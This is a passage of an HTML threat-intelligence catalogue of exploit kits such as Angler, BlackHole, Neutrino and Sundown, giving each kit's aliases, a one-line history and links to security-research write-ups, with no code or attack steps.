<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.trendmicro.com/trendlabs-security-intelligence/new-bizarro-sundown-exploit-kit-spreads-locky/">http://blog.trendmicro.com/trendlabs-security-intelligence/new-bizarro-sundown-exploit-kit-spreads-locky/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.malwarebytes.com/cybercrime/exploits/2016/10/yet-another-sundown-ek-variant/">https://blog.malwarebytes.com/cybercrime/exploits/2016/10/yet-another-sundown-ek-variant/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_hunter"><a class="anchor" href="#_hunter"></a><a class="link" href="#_hunter">Hunter</a></h3>
<div class="paragraph">
<p>Hunter EK is an evolution of 3Ros EK</p>
</div>
<div class="paragraph">
<p>Hunter is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>3ROS Exploit Kit</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 514. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.proofpoint.com/us/threat-insight/post/Hunter-Exploit-Kit-Targets-Brazilian-Banking-Customers">https://www.proofpoint.com/us/threat-insight/post/Hunter-Exploit-Kit-Targets-Brazilian-Banking-Customers</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_greenflash_sundown"><a class="anchor" href="#_greenflash_sundown"></a><a class="link" href="#_greenflash_sundown">GreenFlash Sundown</a></h3>
<div class="paragraph">
<p>GreenFlash Sundown is a variation of Bizarro Sundown without landing</p>
</div>
<div class="paragraph">
<p>GreenFlash Sundown is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Sundown-GF</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 515. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.trendmicro.com/trendlabs-security-intelligence/new-bizarro-sundown-exploit-kit-spreads-locky/">http://blog.trendmicro.com/trendlabs-security-intelligence/new-bizarro-sundown-exploit-kit-spreads-locky/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_angler"><a class="anchor" href="#_angler"></a><a class="link" href="#_angler">Angler</a></h3>
<div class="paragraph">
<p>The Angler Exploit Kit has been the most popular and evolved exploit kit from 2014 to middle of 2016. There was several variation. The historical "indexm" variant was used to spread Lurk. A vip version used notabily to spread Poweliks, the "standard" commercial version, and a declinaison tied to load selling (mostly bankers) that can be associated to EmpirePPC</p>
</div>
<div class="paragraph">
<p>Angler is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>XXX</p>
</li>
<li>
<p>AEK</p>
</li>
<li>
<p>Axpergle</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 516. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blogs.sophos.com/2015/07/21/a-closer-look-at-the-angler-exploit-kit/">https://blogs.sophos.com/2015/07/21/a-closer-look-at-the-angler-exploit-kit/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://malware.dontneedcoffee.com/2015/12/xxx-is-angler-ek.html">http://malware.dontneedcoffee.com/2015/12/xxx-is-angler-ek.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://malware.dontneedcoffee.com/2016/06/is-it-end-of-angler.html">http://malware.dontneedcoffee.com/2016/06/is-it-end-of-angler.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_archie"><a class="anchor" href="#_archie"></a><a class="link" href="#_archie">Archie</a></h3>
<div class="paragraph">
<p>Archie EK</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 517. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.alienvault.com/blogs/labs-research/archie-just-another-exploit-kit">https://www.alienvault.com/blogs/labs-research/archie-just-another-exploit-kit</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_blackhole"><a class="anchor" href="#_blackhole"></a><a class="link" href="#_blackhole">BlackHole</a></h3>
<div class="paragraph">
<p>The BlackHole Exploit Kit has been the most popular exploit kit from 2011 to 2013. Its activity stopped with Paunch&#8217;s arrest (all activity since then is anecdotal and based on an old leak)</p>
</div>
<div class="paragraph">
<p>BlackHole is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>BHEK</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 518. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.trustwave.com/Resources/SpiderLabs-Blog/Blackhole-Exploit-Kit-v2/">https://www.trustwave.com/Resources/SpiderLabs-Blog/Blackhole-Exploit-Kit-v2/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://nakedsecurity.sophos.com/exploring-the-blackhole-exploit-kit/">https://nakedsecurity.sophos.com/exploring-the-blackhole-exploit-kit/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_bleeding_life"><a class="anchor" href="#_bleeding_life"></a><a class="link" href="#_bleeding_life">Bleeding Life</a></h3>
<div class="paragraph">
<p>Bleeding Life is an exploit kit that became open source with its version 2</p>
</div>
<div class="paragraph">
<p>Bleeding Life is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>BL</p>
</li>
<li>
<p>BL2</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 519. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.kahusecurity.com/2011/flash-used-in-idol-malvertisement/">http://www.kahusecurity.com/2011/flash-used-in-idol-malvertisement/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://thehackernews.com/2011/10/bleeding-life-2-exploit-pack-released.html">http://thehackernews.com/2011/10/bleeding-life-2-exploit-pack-released.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cool"><a class="anchor" href="#_cool"></a><a class="link" href="#_cool">Cool</a></h3>
<div class="paragraph">
<p>The Cool Exploit Kit was a kind of BlackHole VIP in 2012/2013</p>
</div>
<div class="paragraph">
<p>Cool is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>CEK</p>
</li>
<li>
<p>Styxy Cool</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 520. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://malware.dontneedcoffee.com/2012/10/newcoolek.html">http://malware.dontneedcoffee.com/2012/10/newcoolek.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://malware.dontneedcoffee.com/2013/07/a-styxy-cool-ek.html">http://malware.dontneedcoffee.com/2013/07/a-styxy-cool-ek.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.trendmicro.com/trendlabs-security-intelligence/styx-exploit-pack-how-it-works/">http://blog.trendmicro.com/trendlabs-security-intelligence/styx-exploit-pack-how-it-works/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fiesta"><a class="anchor" href="#_fiesta"></a><a class="link" href="#_fiesta">Fiesta</a></h3>
<div class="paragraph">
<p>Fiesta Exploit Kit</p>
</div>
<div class="paragraph">
<p>Fiesta is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>NeoSploit</p>
</li>
<li>
<p>Fiexp</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 521. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.0x3a.com/post/110052845124/an-in-depth-analysis-of-the-fiesta-exploit-kit-an">http://blog.0x3a.com/post/110052845124/an-in-depth-analysis-of-the-fiesta-exploit-kit-an</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.kahusecurity.com/2011/neosploit-is-back/">http://www.kahusecurity.com/2011/neosploit-is-back/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_empire"><a class="anchor" href="#_empire"></a><a class="link" href="#_empire">Empire</a></h3>
<div class="paragraph">
<p>The Empire Pack is a variation of RIG operated by a load seller. It&#8217;s being fed by many traffic actors</p>
</div>
<div class="paragraph">
<p>Empire is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>RIG-E</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 522. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://malware.dontneedcoffee.com/2016/10/rig-evolves-neutrino-waves-goodbye.html">http://malware.dontneedcoffee.com/2016/10/rig-evolves-neutrino-waves-goodbye.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_flashpack"><a class="anchor" href="#_flashpack"></a><a class="link" href="#_flashpack">FlashPack</a></h3>
<div class="paragraph">
<p>FlashPack EK got multiple fork. The most common variant seen was the standalone Flash version</p>
</div>
<div class="paragraph">
<p>FlashPack is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>FlashEK</p>
</li>
<li>
<p>SafePack</p>
</li>
<li>
<p>CritXPack</p>
</li>
<li>
<p>Vintage Pack</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 523. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://malware.dontneedcoffee.com/2012/11/meet-critxpack-previously-vintage-pack.html">http://malware.dontneedcoffee.com/2012/11/meet-critxpack-previously-vintage-pack.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://malware.dontneedcoffee.com/2013/04/meet-safe-pack-v20-again.html">http://malware.dontneedcoffee.com/2013/04/meet-safe-pack-v20-again.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_grandsoft"><a class="anchor" href="#_grandsoft"></a><a class="link" href="#_grandsoft">GrandSoft</a></h3>
<div class="paragraph">
<p>GrandSoft Exploit Kit was a quite common exploit kit used in 2012/2013. Disappeared between march 2014 and September 2017</p>
</div>
<div class="paragraph">
<p>GrandSoft is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>StampEK</p>
</li>
<li>
<p>SofosFO</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 524. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://malware.dontneedcoffee.com/2013/09/FinallyGrandSoft.html">http://malware.dontneedcoffee.com/2013/09/FinallyGrandSoft.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://malware.dontneedcoffee.com/2012/10/neosploit-now-showing-bh-ek-20-like.html">http://malware.dontneedcoffee.com/2012/10/neosploit-now-showing-bh-ek-20-like.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://nakedsecurity.sophos.com/2012/08/24/sophos-sucks-malware/">https://nakedsecurity.sophos.com/2012/08/24/sophos-sucks-malware/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_hanjuan"><a class="anchor" href="#_hanjuan"></a><a class="link" href="#_hanjuan">HanJuan</a></h3>
<div class="paragraph">
<p>Hanjuan EK was a one actor fed variation of Angler EK used in evolved malvertising chain targeting USA. It has been using a 0day (CVE-2015-0313) from beginning of December 2014 till beginning of February 2015</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 525. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.malwaresigs.com/2013/10/14/unknown-ek/">http://www.malwaresigs.com/2013/10/14/unknown-ek/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.malwarebytes.com/threat-analysis/2014/08/shining-some-light-on-the-unknown-exploit-kit/">https://blog.malwarebytes.com/threat-analysis/2014/08/shining-some-light-on-the-unknown-exploit-kit/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.trendmicro.com/trendlabs-security-intelligence/a-closer-look-at-the-exploit-kit-in-cve-2015-0313-attack">http://blog.trendmicro.com/trendlabs-security-intelligence/a-closer-look-at-the-exploit-kit-in-cve-2015-0313-attack</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/kafeine/status/562575744501428226">https://twitter.com/kafeine/status/562575744501428226</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_himan"><a class="anchor" href="#_himan"></a><a class="link" href="#_himan">Himan</a></h3>
<div class="paragraph">
<p>Himan Exploit Kit</p>
</div>
<div class="paragraph">
<p>Himan is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>High Load</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 526. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://malware.dontneedcoffee.com/2013/10/HiMan.html">http://malware.dontneedcoffee.com/2013/10/HiMan.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_impact"><a class="anchor" href="#_impact"></a><a class="link" href="#_impact">Impact</a></h3>
<div class="paragraph">
<p>Impact EK</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 527. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://malware.dontneedcoffee.com/2012/12/inside-impact-exploit-kit-back-on-track.html">http://malware.dontneedcoffee.com/2012/12/inside-impact-exploit-kit-back-on-track.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_infinity"><a class="anchor" href="#_infinity"></a><a class="link" href="#_infinity">Infinity</a></h3>
<div class="paragraph">
<p>Infinity is an evolution of Redkit</p>
</div>
<div class="paragraph">
<p>Infinity is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Redkit v2.0</p>
</li>
<li>
<p>Goon</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 528. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.talosintel.com/2013/11/im-calling-this-goon-exploit-kit-for-now.html">http://blog.talosintel.com/2013/11/im-calling-this-goon-exploit-kit-for-now.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.kahusecurity.com/2014/the-resurrection-of-redkit/">http://www.kahusecurity.com/2014/the-resurrection-of-redkit/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_lightsout"><a class="anchor" href="#_lightsout"></a><a class="link" href="#_lightsout">Lightsout</a></h3>
<div class="paragraph">
<p>Lightsout Exploit Kit has been used in Watering Hole attack performed by the APT Group havex</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 529. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.talosintel.com/2014/03/hello-new-exploit-kit.html">http://blog.talosintel.com/2014/03/hello-new-exploit-kit.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.talosintel.com/2014/05/continued-analysis-of-lightsout-exploit.html">http://blog.talosintel.com/2014/05/continued-analysis-of-lightsout-exploit.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://malwageddon.blogspot.fr/2013/09/unknown-ek-by-way-how-much-is-fish.html">http://malwageddon.blogspot.fr/2013/09/unknown-ek-by-way-how-much-is-fish.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_nebula"><a class="anchor" href="#_nebula"></a><a class="link" href="#_nebula">Nebula</a></h3>
<div class="paragraph">
<p>Nebula Exploit Kit has been built on Sundown source and features an internal TDS</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 530. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://malware.dontneedcoffee.com/2017/03/nebula-exploit-kit.html">http://malware.dontneedcoffee.com/2017/03/nebula-exploit-kit.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_neutrino"><a class="anchor" href="#_neutrino"></a><a class="link" href="#_neutrino">Neutrino</a></h3>
<div class="paragraph">
<p>Neutrino Exploit Kit has been one of the major exploit kit from its launch in 2013 till september 2016 when it become private (defense name for this variation is Neutrino-v). This EK vanished from march 2014 till november 2014.</p>
</div>
<div class="paragraph">
<p>Neutrino is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Job314</p>
</li>
<li>
<p>Neutrino Rebooted</p>
</li>
<li>
<p>Neutrino-v</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 531. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://malware.dontneedcoffee.com/2013/03/hello-neutrino-just-one-more-exploit-kit.html">http://malware.dontneedcoffee.com/2013/03/hello-neutrino-just-one-more-exploit-kit.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://malware.dontneedcoffee.com/2014/11/neutrino-come-back.html">http://malware.dontneedcoffee.com/2014/11/neutrino-come-back.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_niteris"><a class="anchor" href="#_niteris"></a><a class="link" href="#_niteris">Niteris</a></h3>
<div class="paragraph">
<p>Niteris was used mainly to target Russian.</p>
</div>
<div class="paragraph">
<p>Niteris is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>CottonCastle</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 532. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://malware.dontneedcoffee.com/2014/06/cottoncastle.html">http://malware.dontneedcoffee.com/2014/06/cottoncastle.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://malware.dontneedcoffee.com/2015/05/another-look-at-niteris-post.html">http://malware.dontneedcoffee.com/2015/05/another-look-at-niteris-post.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_nuclear"><a class="anchor" href="#_nuclear"></a><a class="link" href="#_nuclear">Nuclear</a></h3>
<div class="paragraph">
<p>The Nuclear Pack appeared in 2009 and has been one of the longer living one. Spartan EK was a landing less variation of Nuclear Pack</p>
</div>
<div class="paragraph">
<p>Nuclear is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>NEK</p>
</li>
<li>
<p>Nuclear Pack</p>
</li>
<li>
<p>Spartan</p>
</li>
<li>
<p>Neclu</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 533. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.checkpoint.com/2016/05/17/inside-nuclears-core-unraveling-a-ransomware-as-a-service-infrastructure/">http://blog.checkpoint.com/2016/05/17/inside-nuclears-core-unraveling-a-ransomware-as-a-service-infrastructure/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_phoenix"><a class="anchor" href="#_phoenix"></a><a class="link" href="#_phoenix">Phoenix</a></h3>
<div class="paragraph">
<p>Phoenix Exploit Kit</p>
</div>
<div class="paragraph">
<p>Phoenix is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>PEK</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 534. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://malwareint.blogspot.fr/2010/09/phoenix-exploits-kit-v21-inside.html">http://malwareint.blogspot.fr/2010/09/phoenix-exploits-kit-v21-inside.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.trendmicro.com/trendlabs-security-intelligence/now-exploiting-phoenix-exploit-kit-version-2-5/">http://blog.trendmicro.com/trendlabs-security-intelligence/now-exploiting-phoenix-exploit-kit-version-2-5/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_private_exploit_pack"><a class="anchor" href="#_private_exploit_pack"></a><a class="link" href="#_private_exploit_pack">Private Exploit Pack</a></h3>
<div class="paragraph">
<p>Private Exploit Pack</p>
</div>
<div class="paragraph">
<p>Private Exploit Pack is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>PEP</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 535. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://malware.dontneedcoffee.com/2013/07/pep-new-bep.html">http://malware.dontneedcoffee.com/2013/07/pep-new-bep.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://malwageddon.blogspot.fr/2013/07/unknown-ek-well-hey-hey-i-wanna-be.html">http://malwageddon.blogspot.fr/2013/07/unknown-ek-well-hey-hey-i-wanna-be.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_redkit"><a class="anchor" href="#_redkit"></a><a class="link" href="#_redkit">Redkit</a></h3>
<div class="paragraph">
<p>Redkit has been a major exploit kit in 2012. One of its specific features was to allow its access against a share of a percentage of the customer&#8217;s traffic</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 536. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.trustwave.com/Resources/SpiderLabs-Blog/A-Wild-Exploit-Kit-Appears----Meet-RedKit/">https://www.trustwave.com/Resources/SpiderLabs-Blog/A-Wild-Exploit-Kit-Appears----Meet-RedKit/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://malware.dontneedcoffee.com/2012/05/inside-redkit.html">http://malware.dontneedcoffee.com/2012/05/inside-redkit.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://nakedsecurity.sophos.com/2013/05/09/redkit-exploit-kit-part-2/">https://nakedsecurity.sophos.com/2013/05/09/redkit-exploit-kit-part-2/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_sakura"><a class="anchor" href="#_sakura"></a><a class="link" href="#_sakura">Sakura</a></h3>
<div class="paragraph">
<p>Sakura Exploit Kit appeared in 2012 and was adopted by several big actor</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 537. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.xylibox.com/2012/01/sakura-exploit-pack-10.html">http://www.xylibox.com/2012/01/sakura-exploit-pack-10.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_spl"><a class="anchor" href="#_spl"></a><a class="link" href="#_spl">SPL</a></h3>
<div class="paragraph">
<p>SPL exploit kit was mainly seen in 2012/2013 most often associated with ZeroAccess and Scareware/FakeAV</p>
</div>
<div class="paragraph">
<p>SPL is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>SPL_Data</p>
</li>
<li>
<p>SPLNet</p>
</li>
<li>
<p>SPL2</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 538. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.malwaresigs.com/2012/12/05/spl-exploit-kit/">http://www.malwaresigs.com/2012/12/05/spl-exploit-kit/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_sundown"><a class="anchor" href="#_sundown"></a><a class="link" href="#_sundown">Sundown</a></h3>
<div class="paragraph">
<p>Sundown Exploit Kit is mainly built out of stolen code from other exploit kits</p>
</div>
<div class="paragraph">
<p>Sundown is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Beps</p>
</li>
<li>
<p>Xer</p>
</li>
<li>
<p>Beta</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 539. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://malware.dontneedcoffee.com/2015/06/fast-look-at-sundown-ek.html">http://malware.dontneedcoffee.com/2015/06/fast-look-at-sundown-ek.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.virusbulletin.com/virusbulletin/2015/06/beta-exploit-pack-one-more-piece-crimeware-infection-road">https://www.virusbulletin.com/virusbulletin/2015/06/beta-exploit-pack-one-more-piece-crimeware-infection-road</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_sweet_orange"><a class="anchor" href="#_sweet_orange"></a><a class="link" href="#_sweet_orange">Sweet-Orange</a></h3>
<div class="paragraph">
<p>Sweet Orange</p>
</div>
<div class="paragraph">
<p>Sweet-Orange is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>SWO</p>
</li>
<li>
<p>Anogre</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 540. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
